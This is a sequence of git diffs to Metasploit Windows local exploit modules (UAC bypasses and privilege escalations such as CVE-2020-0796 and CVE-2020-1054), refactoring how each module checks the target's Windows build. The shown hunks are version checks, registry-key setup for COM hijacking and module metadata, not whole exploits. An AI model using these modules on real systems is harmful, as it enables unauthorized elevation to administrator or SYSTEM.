@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Local
     reg_keys = []
     # This reg key will not hurt anything in windows 10+, but is not required.
     version = get_version_info
-    unless version.build_number >= Msf::WindowsVersion::Win10_InitialVersion
+    unless version.build_number >= Msf::WindowsVersion::Win10_InitialRelease
       reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
                     value_name: '',
                     value_type: "REG_EXPAND_SZ",

--- a/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
+++ b/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
@@ -61,7 +61,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows (7|8|2008|2012|10)/ && is_uac_enabled?
+    version = get_version_info
+    if version.build_number >= Msf::WindowsVersion::Win7_SP0 && is_uac_enabled?
       Exploit::CheckCode::Appears
     else
       Exploit::CheckCode::Safe
@@ -142,7 +143,8 @@ class MetasploitModule < Msf::Exploit::Local
     vprint_status("UUID = #{uuid}")
     reg_keys = []
     # This reg key will not hurt anything in windows 10+, but is not required.
-    unless sysinfo['OS'] =~ /Windows (2016|10)/
+    version = get_version_info
+    unless version.build_number >= Msf::WindowsVersion::Win10_1507
       reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
                     value_name: '',
                     value_type: "REG_EXPAND_SZ",

--- a/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
+++ b/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Local
     reg_keys = []
     # This reg key will not hurt anything in windows 10+, but is not required.
     version = get_version_info
-    unless version.build_number >= Msf::WindowsVersion::Win10_1507
+    unless version.build_number >= Msf::WindowsVersion::Win10_InitialVersion
       reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
                     value_name: '',
                     value_type: "REG_EXPAND_SZ",

--- a/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
+++ b/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     version = get_version_info
-    if version.build_number >= Msf::WindowsVersion::Win7_SP0 && is_uac_enabled?
+    if is_uac_enabled?
       Exploit::CheckCode::Appears
     else
       Exploit::CheckCode::Safe

--- a/modules/exploits/windows/local/bypassuac_eventvwr.rb
+++ b/modules/exploits/windows/local/bypassuac_eventvwr.rb
@@ -68,7 +68,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows (7|8|2008|2012|10)/ && is_uac_enabled?
+    version = get_version_info
+    if version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win10_1607)
       Exploit::CheckCode::Appears
     else
       Exploit::CheckCode::Safe

--- a/modules/exploits/windows/local/bypassuac_fodhelper.rb
+++ b/modules/exploits/windows/local/bypassuac_fodhelper.rb
@@ -67,7 +67,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled?
+    version = get_version_info
+    if version.build_number >= Msf::WindowsVersion::Win10_1507 && !version.windows_server? && is_uac_enabled?
       Exploit::CheckCode::Appears
     else
       Exploit::CheckCode::Safe

--- a/modules/exploits/windows/local/bypassuac_fodhelper.rb
+++ b/modules/exploits/windows/local/bypassuac_fodhelper.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     version = get_version_info
-    if version.build_number >= Msf::WindowsVersion::Win10_1507 && !version.windows_server? && is_uac_enabled?
+    if version.build_number >= Msf::WindowsVersion::Win10_InitialRelease && !version.windows_server? && is_uac_enabled?
       Exploit::CheckCode::Appears
     else
       Exploit::CheckCode::Safe

--- a/modules/exploits/windows/local/bypassuac_injection.rb
+++ b/modules/exploits/windows/local/bypassuac_injection.rb
@@ -220,7 +220,7 @@ class MetasploitModule < Msf::Exploit::Local
     paths = {}
 
     version_info = get_version_info
-    if version_info.is_win7_or_2008r2
+    if version_info.win7_or_2008r2?
       paths[:szElevDll] = 'CRYPTBASE.dll'
       paths[:szElevDir] = "#{win_path}\\System32\\sysprep"
       paths[:szElevDirSysWow64] = "#{win_path}\\sysnative\\sysprep"

--- a/modules/exploits/windows/local/bypassuac_injection.rb
+++ b/modules/exploits/windows/local/bypassuac_injection.rb
@@ -220,7 +220,7 @@ class MetasploitModule < Msf::Exploit::Local
     paths = {}
 
     version_info = get_version_info
-    if version_info.major_release == Msf::WindowsVersion::MajorRelease::Win7 # includes 2008
+    if version_info.is_win7_or_2008r2
       paths[:szElevDll] = 'CRYPTBASE.dll'
       paths[:szElevDir] = "#{win_path}\\System32\\sysprep"
       paths[:szElevDirSysWow64] = "#{win_path}\\sysnative\\sysprep"

--- a/modules/exploits/windows/local/bypassuac_injection.rb
+++ b/modules/exploits/windows/local/bypassuac_injection.rb
@@ -199,13 +199,12 @@ class MetasploitModule < Msf::Exploit::Local
   def validate_environment!
     fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
 
-    winver = sysinfo['OS']
-
-    case winver
-    when /Windows (7|8|2008|2012|10)/
-      print_good("#{winver} may be vulnerable.")
+    version_info = get_version_info
+    # According to https://raw.githubusercontent.com/hfiref0x/UACME/c998cb1f1bafd36f566f17208b915dc48dda5edf/README.md
+    if version_info.build_number.between?(Msf::WindowsVersion::Win7_SP0,Msf::WindowsVersion::Win8)
+      print_good("#{version_info.product_name} may be vulnerable.")
     else
-      fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
+      fail_with(Failure::NotVulnerable, "#{version_info.product_name} is not vulnerable.")
     end
 
     if is_uac_enabled?
@@ -220,13 +219,13 @@ class MetasploitModule < Msf::Exploit::Local
   def get_file_paths(win_path, payload_filepath)
     paths = {}
 
-    case sysinfo['OS']
-    when /Windows (7|2008)/
+    version_info = get_version_info
+    if version_info.major_release == Msf::WindowsVersion::MajorRelease::Win7 # includes 2008
       paths[:szElevDll] = 'CRYPTBASE.dll'
       paths[:szElevDir] = "#{win_path}\\System32\\sysprep"
       paths[:szElevDirSysWow64] = "#{win_path}\\sysnative\\sysprep"
       paths[:szElevExeFull] = "#{paths[:szElevDir]}\\sysprep.exe"
-    when /Windows (8|2012|10)/
+    else
       paths[:szElevDll] = 'NTWDBLIB.dll'
       paths[:szElevDir] = "#{win_path}\\System32"
       # This should be fine to be left blank

--- a/modules/exploits/windows/local/bypassuac_injection_winsxs.rb
+++ b/modules/exploits/windows/local/bypassuac_injection_winsxs.rb
@@ -221,13 +221,12 @@ class MetasploitModule < Msf::Exploit::Local
   def validate_environment!
     fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
 
-    winver = sysinfo['OS']
-
-    case winver
-    when /Windows (8|10)/
-      print_good("#{winver} may be vulnerable.")
+    version = get_version_info
+    if (!version.is_windows_server && version.build_number >= Msf::WindowsVersion::Win8) ||
+       (version.is_windows_server && version.build_number.between?(Msf::WindowsVersion::Server2016, Msf::WindowsVersion::Server2019))
+      print_good("#{version.product_name} may be vulnerable.")
     else
-      fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
+      fail_with(Failure::NotVulnerable, "#{version.product_name} is not vulnerable.")
     end
 
     if is_uac_enabled?

--- a/modules/exploits/windows/local/bypassuac_injection_winsxs.rb
+++ b/modules/exploits/windows/local/bypassuac_injection_winsxs.rb
@@ -222,8 +222,8 @@ class MetasploitModule < Msf::Exploit::Local
     fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
 
     version = get_version_info
-    if (!version.is_windows_server && version.build_number >= Msf::WindowsVersion::Win8) ||
-       (version.is_windows_server && version.build_number.between?(Msf::WindowsVersion::Server2016, Msf::WindowsVersion::Server2019))
+    if (!version.windows_server? && version.build_number >= Msf::WindowsVersion::Win8) ||
+       (version.windows_server? && version.build_number.between?(Msf::WindowsVersion::Server2016, Msf::WindowsVersion::Server2019))
       print_good("#{version.product_name} may be vulnerable.")
     else
       fail_with(Failure::NotVulnerable, "#{version.product_name} is not vulnerable.")

--- a/modules/exploits/windows/local/bypassuac_sdclt.rb
+++ b/modules/exploits/windows/local/bypassuac_sdclt.rb
@@ -61,7 +61,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows (Vista|7|8|2008|2012|2016|10)/ && is_uac_enabled?
+    version = get_version_info
+    if version.build_number >= Msf::WindowsVersion::Vista_SP0 && is_uac_enabled?
       Exploit::CheckCode::Appears
     else
       Exploit::CheckCode::Safe

--- a/modules/exploits/windows/local/bypassuac_sluihijack.rb
+++ b/modules/exploits/windows/local/bypassuac_sluihijack.rb
@@ -68,7 +68,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows (8|10)/ && is_uac_enabled?
+    version = get_version_info
+    if version.build_number.between?(Msf::WindowsVersion::Win8, Msf::WindowsVersion::Win10_1909)
       CheckCode::Appears
     else
       CheckCode::Safe

--- a/modules/exploits/windows/local/bypassuac_vbs.rb
+++ b/modules/exploits/windows/local/bypassuac_vbs.rb
@@ -117,13 +117,12 @@ class MetasploitModule < Msf::Exploit::Local
   def validate_environment!
     fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
 
-    winver = sysinfo['OS']
 
-    case winver
-    when /Windows (7|2008)/
-      print_good("#{winver} may be vulnerable.")
+    version = get_version_info
+    if version.win7_or_2008r2?
+      print_good("#{version.product_name} may be vulnerable.")
     else
-      fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
+      fail_with(Failure::NotVulnerable, "#{version.product_name} is not vulnerable.")
     end
 
     if is_uac_enabled?

--- a/modules/exploits/windows/local/bypassuac_windows_store_filesys.rb
+++ b/modules/exploits/windows/local/bypassuac_windows_store_filesys.rb
@@ -59,7 +59,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe")
+    version = get_version_info
+    if version.build_number > Msf::WindowsVersion::Win10_InitialRelease && !version.windows_server? && exists?("C:\\Windows\\System32\\WSReset.exe")
       return CheckCode::Appears
     end
 

--- a/modules/exploits/windows/local/bypassuac_windows_store_reg.rb
+++ b/modules/exploits/windows/local/bypassuac_windows_store_reg.rb
@@ -61,7 +61,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe")
+    version = get_version_info
+    if version.build_number >= Msf::WindowsVersion::Win10_InitialRelease && !version.windows_server? && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe")
       return CheckCode::Appears
     end
 

--- a/modules/exploits/windows/local/capcom_sys_exec.rb
+++ b/modules/exploits/windows/local/capcom_sys_exec.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     version = get_version_info
-    if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.is_windows_server
+    if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.windows_server?
       return Exploit::CheckCode::Unknown
     end
 

--- a/modules/exploits/windows/local/capcom_sys_exec.rb
+++ b/modules/exploits/windows/local/capcom_sys_exec.rb
@@ -60,7 +60,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] !~ /windows (7|8|10)/i
+    version = get_version_info
+    if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.is_windows_server
       return Exploit::CheckCode::Unknown
     end
 

--- a/modules/exploits/windows/local/comahawk.rb
+++ b/modules/exploits/windows/local/comahawk.rb
@@ -128,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
     end
     version = get_version_info
-    vprint_status("Build Number = #{version._build}")
+    vprint_status("OS version: #{version}")
     unless version.build_number.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1809)
       fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362')
     end

--- a/modules/exploits/windows/local/comahawk.rb
+++ b/modules/exploits/windows/local/comahawk.rb
@@ -128,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
     end
     version = get_version_info
-    vprint_status("Build Number = #{version.build}")
+    vprint_status("Build Number = #{version._build}")
     unless version.build_number.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1809)
       fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362')
     end

--- a/modules/exploits/windows/local/comahawk.rb
+++ b/modules/exploits/windows/local/comahawk.rb
@@ -127,10 +127,9 @@ class MetasploitModule < Msf::Exploit::Local
     if sysinfo['Architecture'] == ARCH_X86
       fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
     end
-    sysinfo_value = sysinfo['OS']
-    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
-    vprint_status("Build Number = #{build_num}")
-    unless sysinfo_value =~ /10/ && (build_num > 17133 && build_num < 18362)
+    version = get_version_info
+    vprint_status("Build Number = #{version.build}")
+    unless version.build_number.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1809)
       fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362')
     end
   end

--- a/modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb
+++ b/modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Local
             'Windows 10 v1703 (Build 15063) x86', {
               'UniqueProcessIdOffset' => 180,
               'TokenOffset' => 252,
-              'Version' => 'Build 15063'
+              'Version' => Msf::WindowsVersion::Win10_1703
             }
           ]
         ],
@@ -74,7 +74,8 @@ class MetasploitModule < Msf::Exploit::Local
   def target_info
     fail_with(Failure::None, 'Session is already elevated') if is_system?
 
-    unless sysinfo['OS'].include?(target['Version']) && sysinfo['Architecture'] == 'x86'
+    version = get_version_info
+    unless version.build_number == target['Version'] && sysinfo['Architecture'] == 'x86'
       fail_with(Failure::NoTarget, 'Target is not compatible with exploit')
     end
   end

--- a/modules/exploits/windows/local/cve_2019_1458_wizardopium.rb
+++ b/modules/exploits/windows/local/cve_2019_1458_wizardopium.rb
@@ -63,9 +63,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    sysinfo_value = sysinfo['OS']
-
-    if sysinfo_value !~ /windows/i
+    if session.platform != 'windows'
       # Non-Windows systems are definitely not affected.
       return CheckCode::Safe
     end

--- a/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb
+++ b/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb
@@ -284,10 +284,10 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
     end
 
-    sysinfo_value = sysinfo['OS']
-    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
-    vprint_status("Build Number = #{build_num}")
-    unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 18363)
+    
+    version_info = get_version_info
+    vprint_status("Version: #{version_info.number}")
+    unless version_info.build_version.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1909)
       fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17134-18363')
     end
   end

--- a/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb
+++ b/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb
@@ -284,7 +284,6 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
     end
 
-    
     version_info = get_version_info
     vprint_status("Version: #{version_info.number}")
     unless version_info.build_version.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1909)

--- a/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb
+++ b/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb
@@ -151,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Local
   def check_target_is_running_supported_windows_version
     if sysinfo['OS'].match('Windows').nil?
       fail_with(Failure::NotVulnerable, 'Target is not running Windows!')
-    elsif get_version_info.build_number < Msf::WindowsVersion::Win10_1507
+    elsif get_version_info.build_number < Msf::WindowsVersion::Win10_InitialVersion
       fail_with(Failure::BadConfig, 'Target is running Windows, its not a version this module supports! Bailing...')
     end
   end

--- a/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb
+++ b/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb
@@ -89,7 +89,6 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     sysinfo_value = sysinfo['OS']
-
     if sysinfo_value !~ /windows/i
       # Non-Windows systems are definitely not affected.
       return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
@@ -106,7 +105,8 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     # see https://docs.microsoft.com/en-us/windows/release-information/
-    unless sysinfo_value =~ /(7|8|8\.1|10|2008|2012|2016|2019|1803|1903)/
+    version = get_version_info
+    unless version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win10_1909)
       return CheckCode::Safe('Target is not running a vulnerable version of Windows!')
     end
 
@@ -151,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Local
   def check_target_is_running_supported_windows_version
     if sysinfo['OS'].match('Windows').nil?
       fail_with(Failure::NotVulnerable, 'Target is not running Windows!')
-    elsif sysinfo['OS'].match('Windows 10').nil? && sysinfo['OS'].match('Windows Server 2016').nil? && sysinfo['OS'].match('Windows Server 2019').nil?
+    elsif get_version_info.build_number < Msf::WindowsVersion::Win10_1507
       fail_with(Failure::BadConfig, 'Target is running Windows, its not a version this module supports! Bailing...')
     end
   end

--- a/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb
+++ b/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb
@@ -151,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Local
   def check_target_is_running_supported_windows_version
     if sysinfo['OS'].match('Windows').nil?
       fail_with(Failure::NotVulnerable, 'Target is not running Windows!')
-    elsif get_version_info.build_number < Msf::WindowsVersion::Win10_InitialVersion
+    elsif get_version_info.build_number < Msf::WindowsVersion::Win10_InitialRelease
       fail_with(Failure::BadConfig, 'Target is running Windows, its not a version this module supports! Bailing...')
     end
   end

--- a/modules/exploits/windows/local/cve_2020_0796_smbghost.rb
+++ b/modules/exploits/windows/local/cve_2020_0796_smbghost.rb
@@ -62,17 +62,15 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    sysinfo_value = sysinfo['OS']
-
-    if sysinfo_value !~ /windows/i
+    if session.platform != 'windows'
       # Non-Windows systems are definitely not affected.
       return Exploit::CheckCode::Safe
     end
 
-    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
-    vprint_status("Windows Build Number = #{build_num}")
+    version = get_version_info
+    vprint_status("Windows Build Number = #{version.build_number}")
     # see https://docs.microsoft.com/en-us/windows/release-information/
-    unless sysinfo_value =~ /10/ && (build_num >= 18362 && build_num <= 18363)
+    unless version.build_number.between?(Msf::WindowsVersion::Win10_1903, Msf::WindowsVersion::Win10_1909)
       print_error('The exploit only supports Windows 10 versions 1903 - 1909')
       return CheckCode::Safe
     end

--- a/modules/exploits/windows/local/cve_2020_1048_printerdemon.rb
+++ b/modules/exploits/windows/local/cve_2020_1048_printerdemon.rb
@@ -171,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Local
   def check
     version = get_version_info
 
-    vprint_status("Build Number = #{version._build}")
+    vprint_status("OS version: #{version}")
     return Exploit::CheckCode::Appears if version.build_number.between?(Msf::WindowsVersion::Win10_InitialRelease, Msf::WindowsVersion::Win10_1909)
 
     return Exploit::CheckCode::Safe

--- a/modules/exploits/windows/local/cve_2020_1048_printerdemon.rb
+++ b/modules/exploits/windows/local/cve_2020_1048_printerdemon.rb
@@ -44,7 +44,11 @@ class MetasploitModule < Msf::Exploit::Local
         'DefaultOptions' => {
           'DisablePayloadHandler' => true
         },
-        'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[

--- a/modules/exploits/windows/local/cve_2020_1048_printerdemon.rb
+++ b/modules/exploits/windows/local/cve_2020_1048_printerdemon.rb
@@ -169,10 +169,10 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    sysinfo_value = sysinfo['OS']
-    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
-    vprint_status("Build Number = #{build_num}")
-    return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18363
+    version = get_version_info
+
+    vprint_status("Build Number = #{version._build}")
+    return Exploit::CheckCode::Appears if version.build_number.between?(Msf::WindowsVersion::Win10_InitialRelease, Msf::WindowsVersion::Win10_1909)
 
     return Exploit::CheckCode::Safe
   end

--- a/modules/exploits/windows/local/cve_2020_1054_drawiconex_lpe.rb
+++ b/modules/exploits/windows/local/cve_2020_1054_drawiconex_lpe.rb
@@ -20,53 +20,53 @@ class MetasploitModule < Msf::Exploit::Local
 
   def initialize(info = {})
     super(
-        update_info(
-          info,
-          'Name' => 'Microsoft Windows DrawIconEx OOB Write Local Privilege Elevation',
-          'Description' => %q{
-            This module exploits CVE-2020-1054, an out of bounds write reachable from DrawIconEx
-            within win32k. The out of bounds write can be used to overwrite the pvbits of a
-            SURFOBJ. By utilizing this vulnerability to execute controlled writes to kernel
-            memory, an attacker can gain arbitrary code execution as the SYSTEM user.
+      update_info(
+        info,
+        'Name' => 'Microsoft Windows DrawIconEx OOB Write Local Privilege Elevation',
+        'Description' => %q{
+          This module exploits CVE-2020-1054, an out of bounds write reachable from DrawIconEx
+          within win32k. The out of bounds write can be used to overwrite the pvbits of a
+          SURFOBJ. By utilizing this vulnerability to execute controlled writes to kernel
+          memory, an attacker can gain arbitrary code execution as the SYSTEM user.
 
-            This module has been tested against a fully updated Windows 7 x64 SP1. Offsets
-            within the exploit code may need to be adjusted to work with other versions of
-            Windows.
-          },
-          'License' => MSF_LICENSE,
-          'Author' => [
-            'Netanel Ben-Simon',
-            'Yoav Alon',
-            'bee13oy',
-            'timwr', # msf module
-          ],
-          'Platform' => 'win',
-          'SessionTypes' => ['meterpreter'],
-          'Targets' => [
-            ['Windows 7 x64', { 'Arch' => ARCH_X64 }]
-          ],
-          'DefaultTarget' => 0,
-          'DefaultOptions' => {
-            'WfsDelay' => 30
-          },
-          'Payload' => {
-            'Space' => 4096
-          },
-          'Notes' => {
-            'Stability' => [ CRASH_OS_RESTARTS ],
-            'Reliability' => [ UNRELIABLE_SESSION ],
-            'SideEffects' => [ IOC_IN_LOGS ]
-          },
-          'References' => [
-            ['CVE', '2020-1054'],
-            ['URL', 'https://cpr-zero.checkpoint.com/vulns/cprid-2153/'],
-            ['URL', 'https://0xeb-bp.com/blog/2020/06/15/cve-2020-1054-analysis.html'],
-            ['URL', 'https://github.com/DreamoneOnly/2020-1054/blob/master/x64_src/main.cpp'],
-            ['URL', 'https://github.com/KaLendsi/CVE-2020-1054/blob/master/CVE-2020-1054/exploit.cpp'],
-            ['URL', 'https://github.com/Iamgublin/CVE-2020-1054/blob/master/ConsoleApplication4.cpp']
-          ],
-          'DisclosureDate' => '2020-02-20'
-        )
+          This module has been tested against a fully updated Windows 7 x64 SP1. Offsets
+          within the exploit code may need to be adjusted to work with other versions of
+          Windows.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Netanel Ben-Simon',
+          'Yoav Alon',
+          'bee13oy',
+          'timwr', # msf module
+        ],
+        'Platform' => 'win',
+        'SessionTypes' => ['meterpreter'],
+        'Targets' => [
+          ['Windows 7 x64', { 'Arch' => ARCH_X64 }]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'WfsDelay' => 30
+        },
+        'Payload' => {
+          'Space' => 4096
+        },
+        'Notes' => {
+          'Stability' => [ CRASH_OS_RESTARTS ],
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'References' => [
+          ['CVE', '2020-1054'],
+          ['URL', 'https://cpr-zero.checkpoint.com/vulns/cprid-2153/'],
+          ['URL', 'https://0xeb-bp.com/blog/2020/06/15/cve-2020-1054-analysis.html'],
+          ['URL', 'https://github.com/DreamoneOnly/2020-1054/blob/master/x64_src/main.cpp'],
+          ['URL', 'https://github.com/KaLendsi/CVE-2020-1054/blob/master/CVE-2020-1054/exploit.cpp'],
+          ['URL', 'https://github.com/Iamgublin/CVE-2020-1054/blob/master/ConsoleApplication4.cpp']
+        ],
+        'DisclosureDate' => '2020-02-20'
+      )
     )
   end
 

--- a/modules/exploits/windows/local/cve_2020_1054_drawiconex_lpe.rb
+++ b/modules/exploits/windows/local/cve_2020_1054_drawiconex_lpe.rb
@@ -71,8 +71,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    sysinfo_value = sysinfo['OS']
-    if sysinfo_value !~ /windows/i
+    if session.platform != 'windows'
       # Non-Windows systems are definitely not affected.
       return CheckCode::Safe
     end

--- a/modules/exploits/windows/local/cve_2020_1313_system_orchestrator.rb
+++ b/modules/exploits/windows/local/cve_2020_1313_system_orchestrator.rb
@@ -150,10 +150,9 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    sysinfo_value = sysinfo['OS']
-    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
-    vprint_status("Build Number = #{build_num}")
-    if sysinfo_value =~ /10/ && (build_num > 17763) && (build_num <= 19041)
+    version = get_version_info
+    vprint_status("Build Number = #{version.build}")
+    if version.build_number.between?(Msf::WindowsVersion::Win10_1903, Msf::WindowsVersion::Win10_2004)
       return Exploit::CheckCode::Appears
     else
       return Exploit::CheckCode::Safe

--- a/modules/exploits/windows/local/cve_2020_1313_system_orchestrator.rb
+++ b/modules/exploits/windows/local/cve_2020_1313_system_orchestrator.rb
@@ -151,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     version = get_version_info
-    vprint_status("Build Number = #{version._build}")
+    vprint_status("OS version: #{version}")
     if version.build_number.between?(Msf::WindowsVersion::Win10_1903, Msf::WindowsVersion::Win10_2004)
       return Exploit::CheckCode::Appears
     else

--- a/modules/exploits/windows/local/cve_2020_1313_system_orchestrator.rb
+++ b/modules/exploits/windows/local/cve_2020_1313_system_orchestrator.rb
@@ -151,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     version = get_version_info
-    vprint_status("Build Number = #{version.build}")
+    vprint_status("Build Number = #{version._build}")
     if version.build_number.between?(Msf::WindowsVersion::Win10_1903, Msf::WindowsVersion::Win10_2004)
       return Exploit::CheckCode::Appears
     else

--- a/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
+++ b/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Common
   include Msf::Post::File
   include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Version
   include Msf::Exploit::EXE
   include Msf::Post::Windows::Powershell
 
@@ -174,11 +175,9 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    sysinfo_value = sysinfo['OS']
-    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
-    vprint_status("Build Number = #{build_num}")
-    return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18363
-
+    version = get_version_info
+    vprint_status("Build Number = #{version.build}")
+    return Exploit::CheckCode::Appears if version.build_number.between?(Msf::WindowsVersion::Win10_1507, Msf::WindowsVersion::Win10_1909) 
     return Exploit::CheckCode::Safe
   end
 end

--- a/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
+++ b/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
@@ -176,8 +176,8 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     version = get_version_info
-    vprint_status("Build Number = #{version.build}")
-    return Exploit::CheckCode::Appears if version.build_number.between?(Msf::WindowsVersion::Win10_1507, Msf::WindowsVersion::Win10_1909) 
+    vprint_status("Build Number = #{version._build}")
+    return Exploit::CheckCode::Appears if version.build_number.between?(Msf::WindowsVersion::Win10_InitialVersion, Msf::WindowsVersion::Win10_1909) 
     return Exploit::CheckCode::Safe
   end
 end

--- a/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
+++ b/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
@@ -177,7 +177,7 @@ class MetasploitModule < Msf::Exploit::Local
   def check
     version = get_version_info
     vprint_status("Build Number = #{version._build}")
-    return Exploit::CheckCode::Appears if version.build_number.between?(Msf::WindowsVersion::Win10_InitialVersion, Msf::WindowsVersion::Win10_1909) 
+    return Exploit::CheckCode::Appears if version.build_number.between?(Msf::WindowsVersion::Win10_InitialRelease, Msf::WindowsVersion::Win10_1909) 
     return Exploit::CheckCode::Safe
   end
 end

--- a/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
+++ b/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
